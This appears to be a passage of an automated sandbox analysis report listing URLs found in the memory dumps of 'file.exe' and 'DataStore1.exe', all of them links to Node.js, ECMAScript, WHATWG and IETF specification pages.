Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://no-color.org/
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0-headers.tar.gz
Source: file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0-headers.tar.gzQdX
Source: file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gz
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gzhttps://nodejs.org/download/release
Source: file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.16.0/win-x64/node.lib
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
